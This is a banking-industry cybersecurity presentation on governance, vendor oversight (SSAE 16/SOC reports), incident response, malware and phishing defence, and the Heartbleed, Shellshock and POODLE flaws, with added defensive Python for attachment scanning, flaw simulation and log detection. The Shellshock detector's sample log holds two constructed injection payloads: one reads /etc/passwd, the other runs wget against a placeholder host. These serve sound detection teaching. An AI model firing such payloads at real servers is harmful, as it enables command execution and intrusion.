Cybersecurity and Technology Update Paul Rainbow, Information Security Supervisor, Umpqua Bank Francis Tam, Partner, Moss Adams LLP
Agenda
Cybersecurity Governance
Threat Intelligence/Monitoring
Vendor Management: Third Party Service Providers, SSAE 16
Incident Response/Resilience
Strategy
Focus on Technology: Threat Detection and Monitoring, Malware and Social Engineering, Public Security Flaws
Cybersecurity
$45 million cyberheist and ATM cash-out scheme (December 2012, May 2013, and November 2013).
Twenty-five suspects detained in an international cybercrime ring in April 2015.
Hijack of the Domain Name System (DNS) records of the Federal Reserve Bank of St. Louis in April 2015, redirecting visitors to research.stlouisfed.org to lookalike sites under the attackers' control.
In January 2015, Morgan Stanley fired an employee who it says stole account data for hundreds of thousands of its wealth management clients; stolen information for approximately 900 of those clients was briefly posted online, the company says.
Cybersecurity
eBay, May 2014: 145 million user accounts impacted; $200 million hit to revenue
Anthem Health Insurance, February 2015: PII for 80 million customers stolen; $100+ million to fix
Home Depot, September 2014: 109 million customer records stolen (56 million payment cards, 53 million e-mail addresses)
iCloud, Sony, Neiman Marcus, UPS, Jimmy John's, and on, and on, and on...
Cybersecurity
Heightened awareness of cybersecurity
Legislation and regulations on cybersecurity and privacy: SB 1386 (California Security Breach Information Act), Red Flags Rule, PCI DSS, Cybersecurity Information Sharing Act of 2014 (CISA) (proposed)
Cybersecurity
New federal agencies on cybersecurity:
Cyber Threat Intelligence Integration Center (CTIIC; pronounced "see-tick"), which culls cyberthreat information from a variety of sources within the government and business community and produces timely intelligence about the latest threats and threat actors.
The Department of Homeland Security's National Cybersecurity and Communications Integration Center (NCCIC; pronounced "n-kick") is an around-the-clock cyber situational awareness, incident response, and management center at the nexus of cyber and communications integration for the federal government, intelligence community, and law enforcement.
Cybersecurity
FFIEC members include (http://www.ffiec.gov):
Board of Governors of the Federal Reserve System
Consumer Financial Protection Bureau
Federal Deposit Insurance Corporation
National Credit Union Administration
Office of the Comptroller of the Currency
State Liaison Committee
Cybersecurity: Evolution of Technology in FI
Cybersecurity: Current Threats
Cybersecurity: Cyber Risk Management Governance Threat intelligence Third party/vendor management Incident response and resilience
Cybersecurity: Governance
Cybersecurity: Threat Intelligence
Internal resources: internal audit reports; fraud detection tools; Anti-Money Laundering / Office of Foreign Assets Control / Bank Secrecy Act tools
External resources: Financial Services Information Sharing and Analysis Center (FS-ISAC); FBI InfraGard; United States Secret Service (USSS) Electronic Crimes Task Forces; conferences; vendor reports; CTIIC; NCCIC
Threat Monitoring
It is critical in today's fast-changing environment to stay up to date on threat trends. There are various ways to do this, but FS-ISAC is a valuable asset to financial institutions and financial services companies. It was mentioned in the recent FDIC Cyber Security Awareness presentation.
Threat Monitoring
FS-ISAC provides ongoing trend data and analysis on cybersecurity threats and activities. Members submit samples of phishing and attack activity, which are sanitized and shared with the membership. Groups also exist for peer-to-peer communication and submission of data.
Cybersecurity: Third Party/Vendor Management
Cybersecurity: Third Party/Vendor Management
The latest FFIEC guidance builds on updated third party risk guidance the OCC issued in August 2014. On February 6, 2015, the FFIEC added a 16-page appendix to its Business Continuity Planning (BCP) Booklet, which was first issued in March 2003 and is included in the FFIEC IT Examination Handbook. The new appendix, "Strengthening the Resilience of Outsourced Technology Services," specifically calls out key cybersecurity risks such as distributed denial-of-service attacks, the need for more due diligence of third parties, and infrastructure interdependencies.
Cybersecurity: Third Party/Vendor Management
Appendix J of the BCP Booklet discusses four key elements of BCP that a financial institution should address to ensure that its technology service providers (TSPs) deliver resilient technology services: third party management; third party capacity; testing with third party TSPs; cyber resilience.
Cybersecurity: Third Party/Vendor Management
Cybercriminals leapfrog through banks' information supply chains. A bank's cybersecurity is often only as good as the cybersecurity of its vendors; those third party firms can provide a back door for attackers seeking to steal sensitive bank customer data. NYDFS expects to move forward by the end of 2015 on regulations strengthening cybersecurity standards for banks' third party vendors, including potential measures on the representations and warranties banks receive about the cybersecurity protections in place at those firms. Federal guidance, including from the FFIEC, is expected to follow.
Cybersecurity: Third Party/Vendor Management
Who are your vendors? One critical element of a third party risk program is knowing who all your vendors are. How can you identify all the vendors used by your organization? Useful sources include accounts payable records, the contract register, firewall and VPN rules for external connections, and single sign-on or e-mail logs that reveal SaaS services in use.
Cybersecurity: Third Party/Vendor Management
Risk Rating Areas (Security):
Does the vendor have access to your network or systems?
Do you share sensitive data with the vendor?
Does the vendor have a web presence or give customers access to data via the web?
Does the vendor use subcontractors?
Cybersecurity: Third Party/Vendor Management
Monitoring: Audit reports and other required reporting (SSAE 16) that address business continuity, security, and other facets of the outsourcing relationship can be effective tools. Various reports can provide evidence based on the risk and nature of the service provided: ISO 27001 certification, FISMA, PCI, HIPAA, internal audit reports, etc.
Cybersecurity: Third Party/Vendor Management
SSAE 16 Reports (formerly SAS 70)
SSAE 16 reports are a useful (and widely used) way to monitor third party service providers. The change from SAS 70 to SSAE 16 altered the nature of the reports, so it is important to understand the different types of reports in order to ensure that reliance is justifiable. Review and understand the scope: many reports carve out data centers or other business lines/technologies, and a report that excludes the facility or system your data actually sits in gives no assurance about it. Note also that a SOC 1 (SSAE 16) report covers controls relevant to the user's financial reporting; for security, availability, and confidentiality, ask for a SOC 2.
Report Comparison (Source: AICPA 2011)
Component                                    SOC 1                SOC 2                     SOC 3
1. Auditor's report                          Yes                  Yes                       Yes
2. Detailed system description               Yes                  Yes                       No (brief description only)
3. Management assertion                      Yes                  Yes                       Yes
4. Management's controls                     Yes                  Yes                       No
5. Auditor's tests of controls and results   Yes                  Yes                       No
Controls evaluated against                   control objectives   Trust Services criteria   Trust Services criteria
SOC 1 addresses controls relevant to user entities' financial reporting; SOC 2 addresses the Trust Services principles; SOC 3 is a general-use summary of a SOC 2 examination without the control detail or test results, so it is not sufficient on its own for vendor security monitoring.
Trust Services Principles (the criteria behind SOC 2 and SOC 3): Security, Availability, Processing Integrity, Confidentiality, Privacy
Type 1 vs. Type 2
Type 1 reports describe the system and assess the design of controls at a point in time.
Type 2 reports also test whether the controls operated effectively over a period of time (typically six to twelve months). For ongoing reliance on a vendor, ask for the Type 2 report.
Cybersecurity: Incident Response and Resilience
Preparation: incident response plan and policy; incident response team
Escalation: internal
Notification: external
Cybersecurity: Strategy
People: security awareness training, constant education, instill security in the culture
Process: SOPs, SDLC, change management, provisioning/deprovisioning, access authorization
Policy: acceptable use policy, e-mail security, BYOD policy, system acquisition, incident response and escalation, business continuity
Technology: firewall(s), network design, IDS/IPS, AV/DLP, MDM, encryption, system alerting
Monitoring: ongoing review, awareness, and risk assessment/business impact analysis
Governance: tone at the top, IT strategy, and cybersecurity insurance
Cybersecurity: Technology Areas
Technical
Network topology, architecture, and design
Network device security
DMZ and VLAN segmentation
External connections and extranets
Wireless access point security
Web server security
Internet content filtering and scanning
Intrusion detection/prevention systems
Citrix/Terminal Services
Logging, monitoring, and alerting
Server security and baselines
Virtual environment security
Phishing
Workstation security and hardening
Operating system security and configuration
Application security
Database security
Remote access, VPN connectivity, and modem access
E-mail security
Mobile device security, including BYOD strategy
Virus, spyware, spam, and other malware filtering
Containment measures
Data leakage protection (DLP)
Data encryption (in transit and at rest)
Data backup, restoration, and backup media storage
Physical
Physical system placement and protection
Data center physical access and security controls
Access logging and auditing
Environmental controls
Cybersecurity: Technology Areas
Administrative
Information security management
Information security policies
Organizational controls including staffing
External party risks (e.g., hosting, cloud service providers, etc.)
Compliance with information security laws and regulations (e.g., CJIS, HIPAA, PCI DSS, etc.)
Software development lifecycle (SDLC)
Source code management
Change management of systems and security components
Testing and development procedures
Configuration management
Authentication/login management
Identity management and authorization
User awareness and training
Segregation of duties
Information leakage
Security incident response
Disaster recovery planning
Asset management
Media disposal, including paper records
Software licensing compliance
Self-auditing procedures (e.g., account reviews, penetration testing, etc.)
Remediation procedures
Human Resources security
Software and hardware asset tracking
Software/firmware patch management
Equipment leasing agreements and processes
Social Engineering
Phishing
Security awareness
Malware
It is common to receive e-mail-based malware attempts.
It can come as an attachment (Word documents carrying macros have been very common lately) or as a link.
These typically attempt to download and install malware (the Dridex banking trojan has been the most common) or take the user to a drive-by download site.
Malware Defense
The best defense against malware is layered security:
Security awareness
Firewall
E-mail filtering/monitoring (block or sandbox macro-enabled and executable attachments)
Local anti-virus/anti-malware
Intrusion detection system
Patch management
Restricted administrative rights (least privilege on workstations)
Network segmentation
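As an added example (not code from the presentation), the following Python script shows one of the e-mail filtering checks the layered defense above depends on: it parses a message, walks the attachments and flags script files, Office Open XML documents that carry VBA (the vbaProject.bin part inside the zip, whatever the extension says) and legacy binary Office files that need a dedicated parser before they can be trusted. The message, filenames and attachment contents are constructed for the demo; the standard library is all it needs.

```python
"""Flag e-mail attachments that can carry macro or script malware.

Added illustration; the sample message and attachments are constructed.
"""
from __future__ import annotations

import io
import os
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy binary .doc/.xls container
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".wsf", ".hta", ".exe", ".scr", ".bat", ".cmd", ".ps1"}


def classify_attachment(filename: str, data: bytes) -> str:
    """Return 'script', 'macro', 'legacy-ole' or 'clean' for one attachment."""
    ext = os.path.splitext(filename.lower())[1]
    if ext in SCRIPT_EXTENSIONS:
        return "script"
    if data.startswith(OLE_MAGIC):
        # Binary Office format: macros live in an OLE stream that needs a
        # dedicated parser (e.g. oletools) to inspect, so quarantine for analysis.
        return "legacy-ole"
    if data.startswith(b"PK"):
        # Office Open XML is a zip archive; VBA code is stored in */vbaProject.bin
        # regardless of whether the file is named .docx or .docm.
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as archive:
                if any(name.lower().endswith("vbaproject.bin") for name in archive.namelist()):
                    return "macro"
        except zipfile.BadZipFile:
            pass
    return "clean"


def scan_message(raw: bytes) -> list[tuple[str, str]]:
    """Parse an RFC 5322 message and classify every attachment, in order."""
    message = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in message.iter_attachments():
        filename = part.get_filename() or "(unnamed)"
        payload = part.get_payload(decode=True) or b""
        findings.append((filename, classify_attachment(filename, payload)))
    return findings


def build_office_zip(with_macro: bool) -> bytes:
    """Minimal stand-in for a Word OOXML file (constructed, not a real document)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            archive.writestr("word/vbaProject.bin", b"\x00" * 32)   # placeholder bytes
    return buffer.getvalue()


def build_sample_email() -> bytes:
    """Constructed lure: an 'invoice' macro document, a harmless note, a legacy .doc."""
    message = EmailMessage()
    message["From"] = "accounts@example.com"
    message["To"] = "payables@example.org"
    message["Subject"] = "Invoice attached"
    message.set_content("Please open the attached invoice and confirm payment.")
    message.add_attachment(build_office_zip(with_macro=True), maintype="application",
                           subtype="vnd.ms-word.document.macroEnabled.12",
                           filename="invoice.docm")
    message.add_attachment("Nothing to see here.\n", filename="notes.txt")
    message.add_attachment(OLE_MAGIC + b"\x00" * 24, maintype="application",
                           subtype="msword", filename="old-invoice.doc")
    return message.as_bytes()


if __name__ == "__main__":
    for name, verdict in scan_message(build_sample_email()):
        print(f"{name:18} {verdict}")
```

In a mail gateway this verdict feeds the policy: quarantine "script" and "macro" outright, route "legacy-ole" to a sandbox or olevba-style parser, and pass "clean" through. Content inspection matters because extension and MIME type are attacker-controlled; only the zip contents reliably reveal the macro project.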
Phishing
Phishing comes in many formats, but e-mail is the most common.
Lures usually track events or the time of year (tax forms in April, package delivery notices in December).
The intent varies from disclosure of information (credentials, account details) to wire transfer scams.
Phishing Defense
The best defense is security awareness, but this will never be sufficient on its own, as we are all human.
Technical controls are also key: e-mail/spam filtering, two-factor authentication, and dual control (a second person must approve) for key activities such as wire transfers and payee changes.
Security Flaws
Heartbleed (CVE-2014-0160) is a security bug disclosed in April 2014 in the OpenSSL cryptography library, a widely used implementation of the Transport Layer Security (TLS) protocol. A missing bounds check in the TLS heartbeat extension lets any client read up to 64 KB of the server's process memory per request, which allows theft of the server's private keys and of users' session cookies and passwords, and exploitation leaves nothing in normal application logs.
Shellshock (CVE-2014-6271 and related bugs) is a family of security bugs in the widely used Unix Bash shell, disclosed on September 24, 2014. Bash executed commands appended to an environment variable whose value looked like a function definition, and many Internet-facing services (CGI web applications, some DHCP clients, SSH forced commands) pass attacker-controlled input to Bash through the environment. The exploit allows an attacker to run arbitrary commands with the privileges of the affected service.
Exploits
In one breach reported in 2014, the attackers read user credentials from the memory of a Juniper VPN device that was vulnerable to the Heartbleed flaw at the time, then used the stolen credentials to log into the corporate network through the VPN. The lesson is that patching the web servers is not enough: every TLS endpoint (VPN concentrators, load balancers, appliances) needs the fix, and credentials and certificates that were exposed while a device was vulnerable must be rotated.
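To make the two flaws above concrete, here is an added Python illustration (not from the presentation) with constructed data. The first part models the TLS heartbeat message and shows the bounds check whose absence was Heartbleed: the vulnerable reply trusts the attacker's claimed payload length and copies that many bytes from the buffer, so whatever sits next to the record in memory (simulated here by a constructed byte string) is returned, which is exactly how credentials were pulled from the VPN device in the breach above. The second part is a detector for the Shellshock function-definition marker run over constructed web server log lines.

```python
"""Heartbleed bounds check and Shellshock log detection (added illustration)."""
from __future__ import annotations

import re
import struct

HB_REQUEST = 1
MIN_PADDING = 16          # RFC 6520: at least 16 bytes of padding after the payload


def build_heartbeat(payload: bytes, claimed_length: int | None = None) -> bytes:
    """HeartbeatRequest: type(1) | payload_length(2) | payload | padding(16).
    A malicious client sets claimed_length far larger than the real payload."""
    length = len(payload) if claimed_length is None else claimed_length
    return bytes([HB_REQUEST]) + struct.pack("!H", length) + payload + b"\x00" * MIN_PADDING


def heartbeat_reply_vulnerable(record: bytes, adjacent_memory: bytes) -> bytes:
    """Pre-1.0.1g behaviour: echo payload_length bytes starting at the payload,
    trusting the attacker-supplied length. adjacent_memory simulates whatever
    follows the record on the heap (keys, cookies, passwords)."""
    buffer = record + adjacent_memory
    (payload_length,) = struct.unpack("!H", buffer[1:3])
    return buffer[3:3 + payload_length]


def heartbeat_reply_fixed(record: bytes, adjacent_memory: bytes) -> bytes | None:
    """The OpenSSL 1.0.1g check: discard the request when the claimed payload
    plus header and minimum padding exceeds the record actually received."""
    buffer = record + adjacent_memory
    (payload_length,) = struct.unpack("!H", buffer[1:3])
    if 1 + 2 + payload_length + MIN_PADDING > len(record):
        return None
    return buffer[3:3 + payload_length]


# Shellshock: vulnerable Bash evaluated the commands after an environment
# variable value beginning with the function-definition marker "() {".
# CGI copies request headers into the environment, so the marker shows up in
# log fields such as User-Agent and Referer.
SHELLSHOCK_MARKER = re.compile(r"\(\)\s*\{")


def shellshock_hits(log_lines) -> list[str]:
    """Return the log lines carrying the function-definition marker."""
    return [line for line in log_lines if SHELLSHOCK_MARKER.search(line)]


# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:11:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"-" "() { :;}; /bin/bash -c \'cat /etc/passwd\'"',
    '198.51.100.7 - - [25/Sep/2014:10:11:13 +0000] "GET /index.html HTTP/1.1" 200 2048 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [25/Sep/2014:10:11:14 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 500 0 '
    '"() {:;}; /usr/bin/wget http://192.0.2.10/x" "curl/7.37.0"',
]

# Constructed stand-in for the bytes that happened to follow the record in memory.
SIMULATED_MEMORY = b"user=alice;pass=hunter2;session=1"

if __name__ == "__main__":
    evil = build_heartbeat(b"hi", claimed_length=64)
    print(heartbeat_reply_vulnerable(evil, SIMULATED_MEMORY))   # leaks adjacent memory
    print(heartbeat_reply_fixed(evil, SIMULATED_MEMORY))        # None: request dropped
    print(heartbeat_reply_fixed(build_heartbeat(b"hi"), SIMULATED_MEMORY))  # b'hi'
    for line in shellshock_hits(SAMPLE_LOG):
        print("SHELLSHOCK:", line)
```

The Shellshock pattern is deliberately loose (`()` followed by optional whitespace and `{`) because the marker appeared with and without the space in the wild; false positives in ordinary browser User-Agent strings are rare since those use parentheses around text, not an empty pair. Apply it to any field a CGI script receives from the client, not only User-Agent.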
POODLE
The POODLE attack (CVE-2014-3566, disclosed October 2014) is a man-in-the-middle exploit that takes advantage of clients' fallback to SSL 3.0: the attacker breaks the TLS handshakes so that the client retries with SSL 3.0, then uses a padding-oracle weakness in SSL 3.0's CBC cipher suites to recover plaintext from the encrypted connection, typically a session cookie, one byte at a time. The fix is to disable SSL 3.0 on servers and clients and to support TLS_FALLBACK_SCSV (RFC 7507) so that a server can tell a forced downgrade apart from a genuinely old client and reject it. http://www.poodletest.com
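The downgrade step is the part most people find hard to picture, so here is an added Python simulation (not from the presentation) of the version negotiation only; the byte-recovery attack on SSL 3.0 itself is not implemented. A client walks down its version list after each failed handshake, a man-in-the-middle resets every attempt above SSL 3.0, and the server applies the RFC 7507 rule: a ClientHello that carries TLS_FALLBACK_SCSV but offers less than the server's best version is answered with an inappropriate_fallback alert. The version list, server limits and alert names are assumptions of the model, not output of any real TLS stack.

```python
"""POODLE downgrade dance with and without TLS_FALLBACK_SCSV (added simulation)."""
from __future__ import annotations

from dataclasses import dataclass
from enum import IntEnum


class Version(IntEnum):
    SSL30 = 0x0300
    TLS10 = 0x0301
    TLS11 = 0x0302
    TLS12 = 0x0303


# Browsers of the period retried with the next lower version after a failed handshake.
CLIENT_PREFERENCE = [Version.TLS12, Version.TLS11, Version.TLS10, Version.SSL30]

INAPPROPRIATE_FALLBACK = "alert:inappropriate_fallback"
PROTOCOL_VERSION = "alert:protocol_version"


@dataclass(frozen=True)
class ClientHello:
    version: Version        # highest version offered in this attempt
    fallback_scsv: bool     # TLS_FALLBACK_SCSV cipher suite value present (RFC 7507)


def server_respond(hello: ClientHello, server_max: Version, server_min: Version):
    """Return the negotiated Version, or an alert string if the server refuses."""
    if hello.version < server_min:
        return PROTOCOL_VERSION          # genuinely unsupported (e.g. SSL 3.0 disabled)
    # RFC 7507: a fallback marker on a ClientHello below the server's best version
    # means a downgrade is in progress, not a real incompatibility.
    if hello.fallback_scsv and hello.version < server_max:
        return INAPPROPRIATE_FALLBACK
    return min(hello.version, server_max)


def negotiate(server_max: Version, server_min: Version, send_scsv: bool,
              attacker_blocks_above: Version | None = None):
    """Run the client's fallback loop against the server, with an optional MITM
    that resets every connection offering a version above attacker_blocks_above."""
    for attempt, version in enumerate(CLIENT_PREFERENCE):
        hello = ClientHello(version, fallback_scsv=send_scsv and attempt > 0)
        if attacker_blocks_above is not None and version > attacker_blocks_above:
            continue                     # connection reset; client retries lower
        result = server_respond(hello, server_max, server_min)
        if isinstance(result, Version):
            return result
        if result == INAPPROPRIATE_FALLBACK:
            return result                # client must stop here, not retry lower
        # PROTOCOL_VERSION: try the next lower version
    return "failed"


def scenarios() -> dict[str, object]:
    """Four outcomes a practitioner should recognise."""
    return {
        "legacy server, no SCSV, MITM":   negotiate(Version.TLS12, Version.SSL30, False, Version.SSL30),
        "legacy server, SCSV, MITM":      negotiate(Version.TLS12, Version.SSL30, True, Version.SSL30),
        "SSL3 disabled, no SCSV, MITM":   negotiate(Version.TLS12, Version.TLS10, False, Version.SSL30),
        "legacy server, SCSV, no MITM":   negotiate(Version.TLS12, Version.SSL30, True, None),
    }


if __name__ == "__main__":
    for name, outcome in scenarios().items():
        print(f"{name:32} -> {outcome!s}")
```

The first scenario is the POODLE precondition: the attacker gets the pair onto SSL 3.0 without either side noticing. With the SCSV the same attacker only produces an alert, and with SSL 3.0 disabled the connection fails outright rather than falling to a broken protocol; either control is enough, deploying both is the usual recommendation.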
SSL Labs Tool
Qualys SSL Labs offers a free scanner that grades a public website's SSL/TLS configuration (supported protocol versions, cipher suites, certificate chain, and known flaws such as Heartbleed and POODLE): https://www.ssllabs.com/ssltest/index.html
Presenters Paul Rainbow, CPA, CIA, CISA, CISSP, CTGA Information Security Supervisor (509) 714 4865 Francis Tam, CPA, CISM, CISA, CITP, CRISC, PCIP, PCI QSA Partner (310) 295 3852 Questions?